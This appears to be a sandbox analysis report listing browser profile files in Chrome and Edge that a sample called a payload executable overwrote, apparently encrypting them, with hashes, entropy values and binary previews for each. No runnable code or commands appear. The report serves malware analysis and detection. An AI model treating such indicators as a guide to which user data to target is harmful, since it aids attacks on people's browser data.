                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):929
                                                                                                                                                                      Entropy (8bit):7.806464831376992
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:XhYlO6ANo13hbHzpSwPifgiajk79hTadT2bD:RY46oG5HFtPifgiaY79ZauD
                                                                                                                                                                      MD5:10ADEE6EE2241DFC396629CD794AA827
                                                                                                                                                                      SHA1:D068572255BBC55780313AD884A84EEFE14CCAD8
                                                                                                                                                                      SHA-256:954E235CA660FB4EB74391D37AF6138EB2007E94F6449223C21A665DF0C1FA60
                                                                                                                                                                      SHA-512:8D52F1C88719A12B8B348BE10EEA1272805061C04D75B24FE6C5BE68CCC35DA3FF14CBEF366EB72A7AA63CB37B74DB5B30B9F1708C28D2892B6E783B04C599CD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. .y.....l....J..'./.S... .....t.......v.\....D."..^"}}O..N)I.".. .H......K.u.*D}r..%I......]V.:<Ov.K.,...........'.X.*.|0\L....9.......+.Q.<;c_.e...J.B.fA/...]2...h^eh....G.S.+.+...?..2.Z.+.-.u':r...W0S....%.....]{..C.=....H.w.k......$...mv....Qi.....k..b..<K......1h..W...I[...6%&..MZ.U.s.[."b<....?<..Q...:9..5..n.....R.t........Q.....g......."s..= &F.e...S.4.......>n....>.......@...p...<...q&..."....F.R.V......ra..{?+.1...<?...b.."...z.... ..a.."C...6.0=2xKb.e.AJ..U..g.t..+..]..KB.-..j...1(..L..b{q..k..x.Y6.a...h.......5%.P...D.S...A.)......Vs.Y..T....A.}|...N ....?........`RQ.<...........FmC.N|...%.`.....:[..H=.Q.^*..........#P...Z.7...HE.J....q.00,....}....M.j..w...3F.f...b.....z.(.d./G..R6.EyhR....4F.{b.{.f.Y..w.....!n.'.Kz.f.........We.."u~t.Y........`.....)u}..D>.#.o@....nM?..p[.....A.]....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):968
                                                                                                                                                                      Entropy (8bit):7.805259842210649
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:IRUXu96Gl1dIfU+fM1+F8bY4OG6F930JMKNwA+ZN1V2bD:III6Gl1Aw+ibgudwA+L1uD
                                                                                                                                                                      MD5:ADE6014C3B6B8D3C990F2CC9DCD25991
                                                                                                                                                                      SHA1:A4CF5F3ECEACEE6F16E02EB75570F3C224596248
                                                                                                                                                                      SHA-256:7BFDEE910A26C28819DC785D792949EEDB783564EF98D1329A3F6DBF3FB7BBE1
                                                                                                                                                                      SHA-512:4D56BD363175557F4CF786056C2FD1C31E0B72EDE1DEBD7ACA3D30BBCF76292D958183E26878E81FB4FA860A4EAE8131D6A1E4FEC52C1C83CDF07F76CF076A66
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. [V.l.?3...o.U.....Imd..,.Z...8..oA.P@7.*..#..!./..S...B..._.\4;/...i..U.b.....C.;...(.\.jI....(2.e......o*x..t...V......8PTC.W k>i..=Wf.^di..C.E=...b...jX.w..".U&.....&.N.k...l..........*.=....A...P!2..|.W.g.K.7....a...2.l...%....iW;.U.m..e....4.......h...T.-a...Gl.9........r.....qy.j.^.h/.O.nW....K'#...c?)...'Y*<._.?..BS..d,.N..$....Q.L.e..Z.2.X-*.V.]}RdUS.J+...$?&8.1.^..oK..c.a..P.a...0.B.t..C...v..0...(8..0.qS.F5Q7..g.I..I/.H..i.E..k...k.z.......]nKs.....\... .`..9...V....>&..zY.B...W.......\BX.....j...Y...H=.^..l.....9F...J.<.U2..M....M...5._.fpY.....Re..P@.1qS...K.n.t.$w.......F.2....q+.S4.X...5}m........V..i}...N....`......Vf..).BP.[.:.(.KY.)C.>..i.{y{v.._.#~.~A.e....m..I..o..*..`...`....~........N.r8...O.E5d~.r~..Ic..u......}..Q.qG1....h....sq0."."fB....5 -.mY....5<.x{&i......@|.s.../E>.C...{.B-..%S.....".k.a..O...J.mG.e.?.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2713
                                                                                                                                                                      Entropy (8bit):7.930041378618613
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:tlLuOl29KTtMubOvm7ETCHVA8rhe9pPYtsq5cbNXWa39CTaCSuygB7EhkXztLd+k:z34iSvm7ETCHVRhSAsq54dUTYLY70+dp
                                                                                                                                                                      MD5:6F29C84DBA99818B04782D8BB39442FF
                                                                                                                                                                      SHA1:9D44046F0FC2F3541163A051639D0773FEB655B7
                                                                                                                                                                      SHA-256:996AFF5D5E4A15CB48E8AC92A504E9FC893099E1CE6BAD5E83C5609DDF492222
                                                                                                                                                                      SHA-512:AA92C9F38D82A359BB273ACDAB7D675A3DF78AFA7B4A2F871363A6FDD627311CEF798BC5250FB76A52275393DA5B44A1191AFBE199244CE70352BA1D0B925D2F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:*...#.X.@A..2....0...$..z....%..#`..X..R....$'.".....&.8...01!U..S....>.h.sM.62).x..g..C..a.Y...{j.....P.u.......<u.Prs^.E.......@..+....H..0&...Q>7$.....>}.r.dC.U..fp.(.f.)E..<...b.....o.G..X.......]..t$p.VM.|Z..EB$...m4A.Kv........W>.x..g^..p......P_.{..eOo..EC........'Z....;..=?[`....Bz.Hh.G'..,.r.T$..c.....h...........QO.....'...R.T..+FN.+'...SwqTq..A...k...EU..Y..f..Y....J.B......Mo..b...k...=7{.......z...+'...3..P.m.P......2s|...i.(6{....G../P. ....D..<....;...$..k..~Y).5;|.........{.2.,........jO/<.t.~;{4H.`RvA....+.pu.E.g2.S.^...U.8.Jn.?.xCW(.U...2k.;..L./w.....!....I.l.iT..ZRc..P....C....Eh.t...$&...Z..S.."..6.]Zc.. .4.....C.......X<.O...R..i...=2.....6.......d..W..Qg.@.G..7...L.Y...)..n.V..... .".\.....6.R...>3:E......`..L..C..l..4{~.A...&mU..~..e..gC..`..+.Y.Oc...Jn..Y....=...x/..ds.U....Bev..N.1._...B.C}..A.7..ZG.d.Nmz..YN....z..JI.=?.M.i.:...U..ic..6n...254..>..\...H!.D..AZ.\.s66..H+.xN.....|....C1....Q.~......W..

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):654
                                                                                                                                                                      Entropy (8bit):7.663564918481526
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:kJ0YwX5XDTkCDgF852nmT5n9yeSYKq+RIGdw4HUfnvWSUdNcii9a:FYwX1QHF85jrSY8IxAUfvV2bD
                                                                                                                                                                      MD5:B7A13C848539BFD2DAFDDCFCD81C273F
                                                                                                                                                                      SHA1:08B166B06BCC222D6AACCD548109E77911BB1D0C
                                                                                                                                                                      SHA-256:37670E084566DE9356B7A4B3F2F572E466BF212854987BDF3F37CE33622A7851
                                                                                                                                                                      SHA-512:2629D4FF0D318440AE04F0A6781420AFF6F74125D9CDDB570E45BC8E25B8CAD45C2B0209296D59BE8192DCCB0DD671B671C090AD2AC31988FDEC39720FFEC805
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:2023/b......O.2.T.R..U.$...A...Y...ca..K......K..|.....!.e...J?T."z..Y}.<..*.h*.....Dk....y..O...H..r3.....C3.....>hW^.'nqH.Y]a......4%...\.s4......%c.-..)+e...E.3.Jc.~O.gv ..8..Z8~.H. .tmP..z..8....].KeBH?p...m..u}yu..s..".....Z.c..H...[.N...2.....=f.+.8|....<'Y.......k.....wV./.m.(....f..3...0.k...7.*...6Rpl....KG.,L"UI...~.5..O>u.n..B.._.2..E.K8tG.o.}...[e........+.-@g0...\..av.)..uL.3l..!.$...]G.....\..p*...p....!...J($.TL.m.$...<..:H.}.-!.\.YM_I\..]....=.]...`......H..2qe....^......l..3C[.z.7.?..U9...y...a\.F...]5...2\...i-.,......X.c%WP.......M_...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446
                                                                                                                                                                      Entropy (8bit):7.47262972168018
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:3ANnv+lGmerVs6rbPzzYRmO0fRKf+TtzSUdNcii9a:3m6G3rzrbPw0JK2Tt+2bD
                                                                                                                                                                      MD5:87367C2B0D9B717F233BEDE2FC616345
                                                                                                                                                                      SHA1:F2C06AEC60023680FA7A1C40A57D016F3E0C9B43
                                                                                                                                                                      SHA-256:841123D0AB0DA818352FB331BB05F44C91C41E19E005B3D895F9E5ED0294D1F8
                                                                                                                                                                      SHA-512:61F3F5D5AEE1486631DCFC877E584942A9B31A47BD1B5A00A615C24CA848C48E7F49E85A81EBC9C9F620C18A8ECFECA7D3858B312413A751051EB24CB0222AAF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.On.!.....92..Ba............1a.......i..<.a.l...B.Z.h'r4D....W...h.Tzs.y...X..i.8s.p...@....?.&..2.s..D.....r....<06K.%J..Ww..J(...*.....7..5I[V: .%.*..A..^.TU[...x.D.Ag..\.{!.;mS.L....L.C..vV..~E:7.e....!..!!.m....h,.....UXI.X..YGT....?3.[.MJ.X..'....C.DP..+W.jty.O....>...F.M.;..U.../.$.2`.'.k\...<........O!.*z..o?r.....D.C.....|......@n...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):682
                                                                                                                                                                      Entropy (8bit):7.626205338876973
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:k+XtEh/w/P/7T7y/DKylpjulRTn+z13x/XXE0FjEm/2Xf/JEVdcSUdNcii9a:pXtEBw/ebK3lRyz13JE0FH2nAj2bD
                                                                                                                                                                      MD5:914BD2713998287105003D8CE4F7AE70
                                                                                                                                                                      SHA1:4C45DAE38480FE07D2E5C4ED4AD85D6AADFC23C5
                                                                                                                                                                      SHA-256:8EAA0E83D324BA22F8E6DE46965E725C1CA6D0DF8D5CF9B4EADBDE6FAA3215D8
                                                                                                                                                                      SHA-512:E839DCBF4A1D360C7E2E445C85B704753D7D269E3CD1DD51383561AC6D2EAE86A333DFB4FB298D3E8009A8DFBEC04727E51CA194E68B620ABC448ACF8664DCCC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:2023/}...........5.uF-.H|..}V.r.A.8r...-(..;...p....J.{.....&4....,.:rd...n:.:.;kNlp.L.1..Qv3..[$l@!h.*e....`.t...J.W..L(...x..a....,......x$;PB.#._S.7.....$...gmCM....WE...P.'...0;.....S..ew......Co.z...2].GcV....P.......Jr...du.<.8......L 8_.....{$.k?...ri^O......:........Ka]..m.M.|....:s.....n..B...HGd.+..`.....+...=36hjw...+~E..`..u.o.....S......',...]P..D..."g|f~.>..-.H..I...t..1....n..c..vl.u.>..'. 3[.....6N,vcG'..j...J1.G.,cX.@A.........*-.c.C.c..t.pXl..*..k.dc..!B..q-../.*.....=.p.%.r....co..M.rhD.3..u./.G..mO...AE...6..v...j.V.!uf-..~E...<......B.l.9..r.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):395
                                                                                                                                                                      Entropy (8bit):7.388049002799992
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:S1raVmlsTYXdqhGxd+6JmnnGHmgCPWtoWSUdNcii9a:quVmlsTYwhmYaan7But+2bD
                                                                                                                                                                      MD5:6498C0C2A9CF38D777536A7233F5D2F2
                                                                                                                                                                      SHA1:8C9DE2C97575F400D97959980117AE6DD601C6D0
                                                                                                                                                                      SHA-256:65EE365DE84DAF030FEC22CDDCFC3839D8D325C426A0CC468374752453CC0DA4
                                                                                                                                                                      SHA-512:578466CAF2DA217CE242290F8643DB51CFCFA819200178CC361B044E9DC3356E9F7CB46490BC0CB050C8509CE5B85BC64394E399D7761994531E42533DA25FF1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:*...#8...0.t"...9.:..?M..;.0g.I..:...3..Y..RQ..B..|.[.......\....*....B*..Z...X...0Jq.>;.....{!9.&.v..~...p.NU........0.A^..2......."..L.?nX...U@6....'...|cl1....4_..W...m.T.......o...&......2.=...X.;g..O........K.l..J.b.w.xGd...fa......m..&.w.;H@..l.V.3\.;....Wi.I&..~....ra..Y..G(..G....E-gPu\'..08.s.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):29006
                                                                                                                                                                      Entropy (8bit):7.9937100598541315
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:768:3yUwGMRk3+f/ndyeZp2IR2bhMtFmOSvWeEO5GU:37wGMu3K/dyW2ItSrj
                                                                                                                                                                      MD5:666A973764141624480AAA6F315522A6
                                                                                                                                                                      SHA1:ECCF0E4396ABF9BEBE500E5BC66C9668E4BCDF45
                                                                                                                                                                      SHA-256:279C776CD5D52914ACF5E17640A058B6F46FF5B1F3293C3169C9015854913274
                                                                                                                                                                      SHA-512:ADF593295336078AEC423811159AC6576241F5A279F288F646E4477A08672165C56C629CAD628E5A1C6215A27279F803891490E66EFCB60A9F13DC362DBC2136
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:SQLit;...b..'.=U.h..s*.....A...S....5..).....F.K..;.^...%0...97...fN.......O0<5.U....5A..9h=...F.J..It...N..59.....@Q}//!..-...t..,...#..r.,M...6.)OI.j...l4W~..3..T./....1....DE.3.mS,.z~.q.9d.cY.m.E.........@./PD3.t....g.>..rj.#.R....e......8..+bl/.x.Z...Q......QFg....X.!.r...~...3e...o........d.&?.&U.m}.1I.... .....L..............4.4.^..,t._..y/.X...LX.R......2...&sch.;......n....#(9.t{...4....f.J.L@....N.Q..Fu...a....&8.\..nc%P6C.Oc.q.\...yW.c.#.....A..~"........Tt.Uv.......u...)..|t...i......=$%s<...\..1@......l..3k..#.T.i^N....[....0.Y.........W.~..I|...g....~.|".?9LR.r..5.Y..K....u'ipa..;.m.N..r.}Y.7...TYPq~..-..k.....7Cq4.qY..0......:5Ww..f...k...f_f.+...`S.L.loA&...m...n..c..]n......3.....F*........G.....W../.-.........;......Cw.k.....$aC.4..re...<^...~q..y..b..3M..]....%....HQL...-...f).}............N.._S.c}.2hKv.N!..F.v.7Qn.f.h.(:.t~$.>.$...D.9.G..a.k....8..n|.C.D.'5....ZPT....G~vU.f...9;.>..+p.....C..M......~z...qO...(.U.*|..

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):77068
                                                                                                                                                                      Entropy (8bit):7.997472320557745
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:vSwp7VNeIxbnneq8XUkxHu1JgaVWTKMBneVUVtW1WbuqMGqH:KewCrneq8XUUHhasTK8GUTWGPo
                                                                                                                                                                      MD5:CF48B7F93AEE41487013332B05D7C361
                                                                                                                                                                      SHA1:9244EC8393F9F3FDD00A0492C4943040E847C808
                                                                                                                                                                      SHA-256:00233015ED14CA7060D79EC11A747C88178E1D6F283B3D006B2E4146B9B14261
                                                                                                                                                                      SHA-512:56A582D4C9547898DA0C91A201EEE3B63B9029CDF8B7F3CE016BDB82B6DFD773C266B1B27F2CF6A0A3247AA0C245540B2A51DFA6DC99A52A475320C7EB366F8F
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:A..r.'S]=hK.U....#\Rz...z.+!.. ../.....q....../......?y...@..z!.t.lw...;>.../....8..@....z*.TNz.v3ja..D.../2Jxw.1YV3.T...=.'v.;....ZF.%.q...<...C.........9........|...|......;'V..i.x...:.YE.%B.W<....a.]~!.[.m.v;.WC..jt#..gq..kO..&B.3....>...q*.......H...I.-:"..rP.Y.............'.8J...x.3.\..mk.X0.Y..n.v_.Ih...P...T..9.....x.............#[..e....M....lfp..u.F.+.u..w......I.s+.!..E......+S.......(....,U..R.F...l........v#......{...<}.......6.]%T,...s<..p...jLR...l...G........z.k-.~$yz....1.D...v<.......%....1..^.&.E....Au;..(x....a.....!..T..u~.D....2.Q3S.:...(../.5]...4......)........!g0R...8.y..5"..X.}..0LTU......V...Z...g....K.?..'p.....D..)._.(Y....KP~0.yq.}X.......K`y...../..[.. ........S......L....7..R.aCu.-...}?.....t./.....G...7..9..!.....o@...U..o..\C.........;.M....Q(.e.Y7..H........j..n.!n.qc.....L......r.....*.6...~.*......1...k}Y..-....<..9...T....j.."......h..z&.J.......Dq.[d......FmY..8...mR..E..W.O....).!.oT-;.w.

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.old

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):654
                                                                                                                                                                      Entropy (8bit):7.6606113898760375
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:kC2IBy56BSuEs+Yigs6+aDP8FdhjD2Ppe8oYDUCu7YULSUdNcii9a:hXrxB+/4wFvDkpe8ouUCdUm2bD
                                                                                                                                                                      MD5:8042F604F7EECAE456CCE86C20CDB7B1
                                                                                                                                                                      SHA1:13CC8162CDDD5C321EA8DABA42A704C71F1C820D
                                                                                                                                                                      SHA-256:1510D24ECBE1BE2A8BAA45B84B77E9F3334617E5709BB03E5C1C2F34BD076745
                                                                                                                                                                      SHA-512:3345EF30F8703934F083DC947C1E80FD91A1DD8F18FBE2418FCEE0E54937B5F1C8AF37DDF5903AE1EE82F90C4F8EB9578C93AC6937E2D386C2DFE8910899EB6F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:2023/w.Z..!B.-..H..I..c...b.I....%.....OH.N0%..d9=_.t..:/.'........e;......d..|)......4A.O7.|...Y.....bZ...4.d[....P.....X.....T....-..(X......L..@`.$.x.P.o{.)...M.B...\.../].; M...~..y.|...g..F..+`.".V........$^B.X*.H&...-/;.k........6E.Y........t..~~..f.S../......a......(......&.........cv..o..IA.7.~w.GD.*.{..9.\>.^..3.=.yR29....vr.S!p.B_.......?wrU.0%...k..,.D...V.S.....!p.g..(.*.4.0O.1....-...8Q...g.;...].."K_....+..._.._o.G......KZ.5.L".2....>c..v%,+n..R.n....sk..Ic..*R......X`.4...K...a..s@9\bu\.C.r6.;...T.....D....JSu..M.ViZCS..._Z.ImMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):904
                                                                                                                                                                      Entropy (8bit):7.769688990718084
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:e/ouTLdvOV+P24dHsr4T1ViKBJCiGFQAKaxl2bD:e//Li+P241TT1Vi1PD+D
                                                                                                                                                                      MD5:811EF8FF1F81D5C516416697F2A525B2
                                                                                                                                                                      SHA1:C238929098D3EF379A7E5327C4044E7B0695C56C
                                                                                                                                                                      SHA-256:FD378F22558414A8913A3122B6EFF5EADADE547619CE2DD27D5903CA13060A2D
                                                                                                                                                                      SHA-512:BC5CBFC9FBE6F638EE53117D341607C4C885F6EEBF60DE4C473F1EA780FBAEFC6A24CC9BAE6A4EF94641FAAEE243B0759D83C43F603C599F540423FF047F75EE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.f.5...me;...M....~.b9.....ht....%.j....4o2F..q..!.h..I..L..:..g./E..TN[<ew..S...f#.../.?i.E.v.r...........(.S....G...(z.J.z.|4..-..U.T."...s.Rfj.&.A.k.....l/le~M.ff..|...........aS.s...f..30.r.&.icb..e.g.......#t..$.J.....6...9 .i..@.X.@.n.e...........r.Lf.u.....8.b..(.a.:.e.x.............[w./..Y...a.|.{.`....e.Y.F..........g.,.c.....V8......!.:nn1...!..t%.R.'8S...E.....h.D..]#).8\....Q.O.....PE....`W...._..:U"~...}.....8Wf....5O....Y....D.^+... K.Z.^.d9.(2X0...4;..F.#\.d.S.._.=.v....F..@.......8..KG.i;.<.....z..lB....x.............J....fbMX..G.....Ry>A.k.\.{'.#[.,3..%......_.E..U[Lm.;....W.S.....~......*Wd../9.....Y..6P.ns.*..0.-$L.H.].,f.....S..T%..>..o...0j.8y..70.*8.......Ym....\g"i....+S...v..@..........%.|$...Y.5.J.L"uH.....V.*..[..).8c.~.s<..H..v]....q..`.[H.K$U..^..b5.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):490
                                                                                                                                                                      Entropy (8bit):7.5195178139838275
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:S4vN51p9Tt1cEQExe1Ln4i/Ncqg7Om6zhaUukHhSUdNcii9a:pN51c5HUi5gS2x2bD
                                                                                                                                                                      MD5:A751FD83352480B0C47A747348C71ABB
                                                                                                                                                                      SHA1:3135D262AE60946B0CA7AE7472AADE0A048E2666
                                                                                                                                                                      SHA-256:9E7888E4B12B82CF22CF42A40E0AC06AF5B2747588ED2640824C68030CA0FDDE
                                                                                                                                                                      SHA-512:C222F331187E4C486DF22BF54557FFF3E6E68CB2D815D06111D5C6CADB18786D101D3F23BC2379F43B530E60AD93CC2C6D30FCAF008D0A947E46ECEDD29DB540
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:*...#.?.wyj..J..F..z.....7.n[.9AF.+7.<_~..[.&P....u........o.f...P.)........F.......jI.....0V...W..L....._M..\.+\.r.9z...#...{.v...u.(...](..DfGR..B.P.2....!..u...,..rm!....Vz..U7..N-....G*d...;Pb...../j.=%/.y...7...|....|......l..[]..........y.*\....#....nv._...{tld*b.=A.....C.*.....C.......5jQ...Q.i....s..a{.P.Q.p9....../[@...5...K..w..k..p)../.K.........JY....^..}.......J..<..[.T..%.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):374
                                                                                                                                                                      Entropy (8bit):7.323654997536762
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:b+HoYHCus9gyN5QRN1yEGzPUeM8goOUEj0iM2NuwhD4mdvRX7fB+o7nIS1WdNciD:aIWsiyN5QRNgrzMeMWoAlwxpXB7MSUdV
                                                                                                                                                                      MD5:AFDCF40DA8613D0D3A9BEB8F1B54849C
                                                                                                                                                                      SHA1:A799AABB3F7965DAF0DA0F89BD46CF7ADEA54F3C
                                                                                                                                                                      SHA-256:34CF2623BA44C3D9404935A038407FA96C4AE4ACB35862317F448473CFEE91F0
                                                                                                                                                                      SHA-512:041C337F513EFDFCB6C6A9CDCB6C10F567D10E23EF82FC182934BFB58D45A9DE8910A44E897927DC43CFFE960DA0BC30D06E477757CA73305FD77CABBBE17DD6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.On.!.p....DD.`..i.j.d....oM.@.J.y.&r...M..W.@{|..?,......'?.f.t0..9)JQ.|.l..G..R....C.I...2..r.'.ZP......?.`.O..s_..E.:@+m.A_/....J7CC....+K.p..=.,9ywu.....Z...G~..p..yH.. .w......D:...~..o..'Aa.X=\..2D.i.%.d...w.;S[=G..P...3....HIcU.1..]Ij.A&..../].;.......{. *..qt....P...^.T..FmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):684
                                                                                                                                                                      Entropy (8bit):7.679365941913458
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:k0ZeWzoMvBbYg+E+lBND7WhEEd1W+Imkmszpf7vQ5V7o6Odv8rLg3yzzZgUkGzSw:HNzo8BEg+E+1PEdg+I7DY5V06MmLKrGd
                                                                                                                                                                      MD5:FAAFC10F47E9E9B9E87ECC04E7D908AF
                                                                                                                                                                      SHA1:05A0DF47D965D6AE23DD497C48398A980573C6D4
                                                                                                                                                                      SHA-256:3B7721EAF7C82047D1371F75130F492A661DD6F9A3AA17748DE0869DCF877419
                                                                                                                                                                      SHA-512:3F454CC686DC02C304563289811AAD668866C37594E078CDA33502D1F4950DF272FB22E9B41065BC1377B75B05A3CB58ED96D62A43E1F870C844C9079397673E
                                                                                                                                                                      Malicious:false
